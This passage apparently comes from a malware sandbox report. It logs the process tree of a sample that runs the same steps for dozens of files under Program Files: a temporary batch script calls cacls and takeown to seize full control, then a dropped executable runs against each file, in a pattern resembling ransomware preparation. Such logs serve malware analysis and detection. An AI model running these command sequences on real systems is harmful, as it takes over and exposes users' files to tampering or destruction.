C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-Bold.otf"3⤵PID:208
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c jigPt9cX.exe -accepteula "MyriadPro-Bold.otf" -nobanner3⤵PID:1264
-
C:\Users\Admin\AppData\Local\Temp\jigPt9cX.exejigPt9cX.exe -accepteula "MyriadPro-Bold.otf" -nobanner4⤵PID:828
-
-
-
C:\Users\Admin\AppData\Local\Temp\jigPt9cX.exejigPt9cX.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:940
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\75YARYUT.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Icons\SC_Reader.exe""2⤵PID:880
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Icons\SC_Reader.exe" /E /G Admin:F /C3⤵PID:556
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Icons\SC_Reader.exe"3⤵PID:832
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c jigPt9cX.exe -accepteula "SC_Reader.exe" -nobanner3⤵PID:1572
-
C:\Users\Admin\AppData\Local\Temp\jigPt9cX.exejigPt9cX.exe -accepteula "SC_Reader.exe" -nobanner4⤵PID:1380
-
-
-
C:\Users\Admin\AppData\Local\Temp\jigPt9cX.exejigPt9cX.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1496
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\75YARYUT.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt55.ths""2⤵PID:952
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt55.ths" /E /G Admin:F /C3⤵PID:1916
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt55.ths"3⤵PID:1000
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c jigPt9cX.exe -accepteula "brt55.ths" -nobanner3⤵PID:1796
-
C:\Users\Admin\AppData\Local\Temp\jigPt9cX.exejigPt9cX.exe -accepteula "brt55.ths" -nobanner4⤵PID:1696
-
-
-
C:\Users\Admin\AppData\Local\Temp\jigPt9cX.exejigPt9cX.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1568
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\75YARYUT.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa03.hsp""2⤵PID:1780
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa03.hsp" /E /G Admin:F /C3⤵PID:1920
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa03.hsp"3⤵PID:1992
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c jigPt9cX.exe -accepteula "usa03.hsp" -nobanner3⤵PID:940
-
C:\Users\Admin\AppData\Local\Temp\jigPt9cX.exejigPt9cX.exe -accepteula "usa03.hsp" -nobanner4⤵PID:1756
-
-
-
C:\Users\Admin\AppData\Local\Temp\jigPt9cX.exejigPt9cX.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:896
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\75YARYUT.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CYRILLIC.TXT""2⤵PID:336
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CYRILLIC.TXT" /E /G Admin:F /C3⤵PID:800
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CYRILLIC.TXT"3⤵PID:1988
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c jigPt9cX.exe -accepteula "CYRILLIC.TXT" -nobanner3⤵PID:304
-
C:\Users\Admin\AppData\Local\Temp\jigPt9cX.exejigPt9cX.exe -accepteula "CYRILLIC.TXT" -nobanner4⤵PID:1692
-
-
-
C:\Users\Admin\AppData\Local\Temp\jigPt9cX.exejigPt9cX.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1596
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\75YARYUT.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1252.TXT""2⤵PID:1864
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1252.TXT" /E /G Admin:F /C3⤵PID:744
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1252.TXT"3⤵PID:956
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c jigPt9cX.exe -accepteula "CP1252.TXT" -nobanner3⤵PID:1568
-
C:\Users\Admin\AppData\Local\Temp\jigPt9cX.exejigPt9cX.exe -accepteula "CP1252.TXT" -nobanner4⤵PID:952
-
-
-
C:\Users\Admin\AppData\Local\Temp\jigPt9cX.exejigPt9cX.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:320
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\75YARYUT.bat" "C:\Program Files (x86)\Windows Mail\wab.exe""2⤵PID:1752
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Windows Mail\wab.exe" /E /G Admin:F /C3⤵PID:816
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Windows Mail\wab.exe"3⤵PID:968
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c jigPt9cX.exe -accepteula "wab.exe" -nobanner3⤵PID:824
-
C:\Users\Admin\AppData\Local\Temp\jigPt9cX.exejigPt9cX.exe -accepteula "wab.exe" -nobanner4⤵PID:1224
-
-
-
C:\Users\Admin\AppData\Local\Temp\jigPt9cX.exejigPt9cX.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1380
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\75YARYUT.bat" "C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.Targets""2⤵PID:1800
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.Targets" /E /G Admin:F /C3⤵PID:1692
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.Targets"3⤵PID:1912
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c jigPt9cX.exe -accepteula "Workflow.Targets" -nobanner3⤵PID:1836
-
C:\Users\Admin\AppData\Local\Temp\jigPt9cX.exejigPt9cX.exe -accepteula "Workflow.Targets" -nobanner4⤵PID:1284
-
-
-
C:\Users\Admin\AppData\Local\Temp\jigPt9cX.exejigPt9cX.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1796
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\75YARYUT.bat" "C:\Program Files\Windows Journal\en-US\Journal.exe.mui""2⤵PID:956
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Journal\en-US\Journal.exe.mui" /E /G Admin:F /C3⤵PID:216
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Journal\en-US\Journal.exe.mui"3⤵PID:1920
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c jigPt9cX.exe -accepteula "Journal.exe.mui" -nobanner3⤵PID:1852
-
C:\Users\Admin\AppData\Local\Temp\jigPt9cX.exejigPt9cX.exe -accepteula "Journal.exe.mui" -nobanner4⤵PID:1812
-
-
-
C:\Users\Admin\AppData\Local\Temp\jigPt9cX.exejigPt9cX.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1756
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\75YARYUT.bat" "C:\Program Files\Windows Journal\Templates\Graph.jtp""2⤵PID:968
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Journal\Templates\Graph.jtp" /E /G Admin:F /C3⤵PID:1224
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Journal\Templates\Graph.jtp"3⤵
- Modifies file permissions
PID:1572
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c jigPt9cX.exe -accepteula "Graph.jtp" -nobanner3⤵PID:1624
-
C:\Users\Admin\AppData\Local\Temp\jigPt9cX.exejigPt9cX.exe -accepteula "Graph.jtp" -nobanner4⤵PID:1144
-
-
-
C:\Users\Admin\AppData\Local\Temp\jigPt9cX.exejigPt9cX.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1692
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\75YARYUT.bat" "C:\Program Files\Windows Mail\wabmig.exe""2⤵PID:1916
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Mail\wabmig.exe" /E /G Admin:F /C3⤵PID:1836
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Mail\wabmig.exe"3⤵
- Modifies file permissions
PID:1696
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c jigPt9cX.exe -accepteula "wabmig.exe" -nobanner3⤵PID:592
-
C:\Users\Admin\AppData\Local\Temp\jigPt9cX.exejigPt9cX.exe -accepteula "wabmig.exe" -nobanner4⤵PID:1824
-
-
-
C:\Users\Admin\AppData\Local\Temp\jigPt9cX.exejigPt9cX.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:216
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\75YARYUT.bat" "C:\Program Files (x86)\Windows Photo Viewer\en-US\PhotoViewer.dll.mui""2⤵PID:1908
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Windows Photo Viewer\en-US\PhotoViewer.dll.mui" /E /G Admin:F /C3⤵PID:1852
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Windows Photo Viewer\en-US\PhotoViewer.dll.mui"3⤵
- Modifies file permissions
PID:816
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c jigPt9cX.exe -accepteula "PhotoViewer.dll.mui" -nobanner3⤵PID:956
-
C:\Users\Admin\AppData\Local\Temp\jigPt9cX.exejigPt9cX.exe -accepteula "PhotoViewer.dll.mui" -nobanner4⤵PID:556
-
-
-
C:\Users\Admin\AppData\Local\Temp\jigPt9cX.exejigPt9cX.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1224
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\75YARYUT.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Legal\ENU\eula.ini""2⤵PID:1752
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Legal\ENU\eula.ini" /E /G Admin:F /C3⤵PID:1624
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Legal\ENU\eula.ini"3⤵
- Modifies file permissions
PID:1596
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c jigPt9cX.exe -accepteula "eula.ini" -nobanner3⤵PID:204
-
C:\Users\Admin\AppData\Local\Temp\jigPt9cX.exejigPt9cX.exe -accepteula "eula.ini" -nobanner4⤵PID:968
-
-
-
C:\Users\Admin\AppData\Local\Temp\jigPt9cX.exejigPt9cX.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1836
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\75YARYUT.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AcroSign.prc""2⤵PID:1696
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AcroSign.prc" /E /G Admin:F /C3⤵PID:1988
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AcroSign.prc"3⤵PID:1920
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c jigPt9cX.exe -accepteula "AcroSign.prc" -nobanner3⤵PID:1284
-
C:\Users\Admin\AppData\Local\Temp\jigPt9cX.exejigPt9cX.exe -accepteula "AcroSign.prc" -nobanner4⤵PID:1000
-
-
-
C:\Users\Admin\AppData\Local\Temp\jigPt9cX.exejigPt9cX.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:396
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\75YARYUT.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\forms_distributed.gif""2⤵PID:1256
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\forms_distributed.gif" /E /G Admin:F /C3⤵PID:432
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\forms_distributed.gif"3⤵
- Modifies file permissions
PID:560
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c jigPt9cX.exe -accepteula "forms_distributed.gif" -nobanner3⤵PID:1224
-
C:\Users\Admin\AppData\Local\Temp\jigPt9cX.exejigPt9cX.exe -accepteula "forms_distributed.gif" -nobanner4⤵PID:940
-
-
-
C:\Users\Admin\AppData\Local\Temp\jigPt9cX.exejigPt9cX.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1228
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\75YARYUT.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviews_sent.gif""2⤵PID:1692
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviews_sent.gif" /E /G Admin:F /C3⤵PID:832
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviews_sent.gif"3⤵
- Modifies file permissions
PID:1316
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c jigPt9cX.exe -accepteula "reviews_sent.gif" -nobanner3⤵PID:1028
-
C:\Users\Admin\AppData\Local\Temp\jigPt9cX.exejigPt9cX.exe -accepteula "reviews_sent.gif" -nobanner4⤵PID:1796
-
-
-
C:\Users\Admin\AppData\Local\Temp\jigPt9cX.exejigPt9cX.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:972
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\75YARYUT.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\stop_collection_data.gif""2⤵PID:320
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\stop_collection_data.gif" /E /G Admin:F /C3⤵PID:1000
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\stop_collection_data.gif"3⤵
- Modifies file permissions
PID:952
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c jigPt9cX.exe -accepteula "stop_collection_data.gif" -nobanner3⤵PID:396
-
C:\Users\Admin\AppData\Local\Temp\jigPt9cX.exejigPt9cX.exe -accepteula "stop_collection_data.gif" -nobanner4⤵PID:1696
-
-
-
C:\Users\Admin\AppData\Local\Temp\jigPt9cX.exejigPt9cX.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:824
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\75YARYUT.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\ReadMe.htm""2⤵PID:1572
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\ReadMe.htm" /E /G Admin:F /C3⤵PID:940
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\ReadMe.htm"3⤵
- Modifies file permissions
PID:1624
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c jigPt9cX.exe -accepteula "ReadMe.htm" -nobanner3⤵PID:1228
-
C:\Users\Admin\AppData\Local\Temp\jigPt9cX.exejigPt9cX.exe -accepteula "ReadMe.htm" -nobanner4⤵PID:1256
-
-
-
C:\Users\Admin\AppData\Local\Temp\jigPt9cX.exejigPt9cX.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:204
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\75YARYUT.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-It.otf""2⤵PID:1424
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-It.otf" /E /G Admin:F /C3⤵PID:1796
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-It.otf"3⤵PID:1988
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c jigPt9cX.exe -accepteula "MinionPro-It.otf" -nobanner3⤵PID:972
-
C:\Users\Admin\AppData\Local\Temp\jigPt9cX.exejigPt9cX.exe -accepteula "MinionPro-It.otf" -nobanner4⤵PID:1692
-
-
-
C:\Users\Admin\AppData\Local\Temp\jigPt9cX.exejigPt9cX.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1284
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\75YARYUT.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\ZX______.PFB""2⤵PID:1756
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\ZX______.PFB" /E /G Admin:F /C3⤵PID:1696
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\ZX______.PFB"3⤵
- Modifies file permissions
PID:956
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c jigPt9cX.exe -accepteula "ZX______.PFB" -nobanner3⤵PID:1916
-
C:\Users\Admin\AppData\Local\Temp\jigPt9cX.exejigPt9cX.exe -accepteula "ZX______.PFB" -nobanner4⤵PID:896
-
-
-
C:\Users\Admin\AppData\Local\Temp\jigPt9cX.exejigPt9cX.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1224
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\75YARYUT.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt04.hsp""2⤵PID:960
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt04.hsp" /E /G Admin:F /C3⤵PID:1256
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt04.hsp"3⤵PID:968
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c jigPt9cX.exe -accepteula "brt04.hsp" -nobanner3⤵PID:204
-
C:\Users\Admin\AppData\Local\Temp\jigPt9cX.exejigPt9cX.exe -accepteula "brt04.hsp" -nobanner4⤵PID:1572
-
-
-
C:\Users\Admin\AppData\Local\Temp\jigPt9cX.exejigPt9cX.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1028
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\75YARYUT.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\engphon.env""2⤵PID:216
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\engphon.env" /E /G Admin:F /C3⤵PID:1692
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\engphon.env"3⤵PID:336
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c jigPt9cX.exe -accepteula "engphon.env" -nobanner3⤵PID:1284
-
C:\Users\Admin\AppData\Local\Temp\jigPt9cX.exejigPt9cX.exe -accepteula "engphon.env" -nobanner4⤵PID:780
-
-
-
C:\Users\Admin\AppData\Local\Temp\jigPt9cX.exejigPt9cX.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:396
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\75YARYUT.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CORPCHAR.TXT""2⤵PID:1380
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CORPCHAR.TXT" /E /G Admin:F /C3⤵PID:896
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CORPCHAR.TXT"3⤵PID:940
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c jigPt9cX.exe -accepteula "CORPCHAR.TXT" -nobanner3⤵PID:1224
-
C:\Users\Admin\AppData\Local\Temp\jigPt9cX.exejigPt9cX.exe -accepteula "CORPCHAR.TXT" -nobanner4⤵PID:1756
-
-
-
C:\Users\Admin\AppData\Local\Temp\jigPt9cX.exejigPt9cX.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1228
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\75YARYUT.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1250.TXT""2⤵PID:1836
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1250.TXT" /E /G Admin:F /C3⤵PID:1572
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1250.TXT"3⤵PID:1796
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c jigPt9cX.exe -accepteula "CP1250.TXT" -nobanner3⤵PID:1028
-
C:\Users\Admin\AppData\Local\Temp\jigPt9cX.exejigPt9cX.exe -accepteula "CP1250.TXT" -nobanner4⤵PID:960
-
-
-
C:\Users\Admin\AppData\Local\Temp\jigPt9cX.exejigPt9cX.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:972
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\75YARYUT.bat" "C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.Targets""2⤵PID:1536
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.Targets" /E /G Admin:F /C3⤵PID:780
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.Targets"3⤵PID:1824
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c jigPt9cX.exe -accepteula "Workflow.Targets" -nobanner3⤵PID:1988
-
C:\Users\Admin\AppData\Local\Temp\jigPt9cX.exejigPt9cX.exe -accepteula "Workflow.Targets" -nobanner4⤵PID:1992
-
-
-
C:\Users\Admin\AppData\Local\Temp\jigPt9cX.exejigPt9cX.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1916
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\75YARYUT.bat" "C:\Program Files (x86)\Windows Photo Viewer\en-US\ImagingDevices.exe.mui""2⤵PID:1912
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Windows Photo Viewer\en-US\ImagingDevices.exe.mui" /E /G Admin:F /C3⤵PID:1756
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Windows Photo Viewer\en-US\ImagingDevices.exe.mui"3⤵PID:1256
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c jigPt9cX.exe -accepteula "ImagingDevices.exe.mui" -nobanner3⤵PID:1820
-
C:\Users\Admin\AppData\Local\Temp\jigPt9cX.exejigPt9cX.exe -accepteula "ImagingDevices.exe.mui" -nobanner4⤵PID:304
-
-
-
C:\Users\Admin\AppData\Local\Temp\jigPt9cX.exejigPt9cX.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1876
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\75YARYUT.bat" "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\device.png""2⤵PID:1796
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\device.png" /E /G Admin:F /C3⤵PID:1260
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\device.png"3⤵
- Modifies file permissions
PID:1852
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c jigPt9cX.exe -accepteula "device.png" -nobanner3⤵PID:968
-
C:\Users\Admin\AppData\Local\Temp\jigPt9cX.exejigPt9cX.exe -accepteula "device.png" -nobanner4⤵PID:1752
-
-
-
C:\Users\Admin\AppData\Local\Temp\jigPt9cX.exejigPt9cX.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1144
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\75YARYUT.bat" "C:\Program Files\Windows Journal\en-US\MSPVWCTL.DLL.mui""2⤵PID:1824
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Journal\en-US\MSPVWCTL.DLL.mui" /E /G Admin:F /C3⤵PID:744
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Journal\en-US\MSPVWCTL.DLL.mui"3⤵
- Modifies file permissions
PID:1928
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c jigPt9cX.exe -accepteula "MSPVWCTL.DLL.mui" -nobanner3⤵PID:336
-
C:\Users\Admin\AppData\Local\Temp\jigPt9cX.exejigPt9cX.exe -accepteula "MSPVWCTL.DLL.mui" -nobanner4⤵PID:1800
-
-
-
C:\Users\Admin\AppData\Local\Temp\jigPt9cX.exejigPt9cX.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:208
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\75YARYUT.bat" "C:\Program Files\Windows Journal\Templates\Memo.jtp""2⤵PID:1256
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Journal\Templates\Memo.jtp" /E /G Admin:F /C3⤵PID:956
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Journal\Templates\Memo.jtp"3⤵
- Modifies file permissions
PID:828
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c jigPt9cX.exe -accepteula "Memo.jtp" -nobanner3⤵PID:1780
-
C:\Users\Admin\AppData\Local\Temp\jigPt9cX.exejigPt9cX.exe -accepteula "Memo.jtp" -nobanner4⤵PID:1912
-
-
-
C:\Users\Admin\AppData\Local\Temp\jigPt9cX.exejigPt9cX.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1028
-
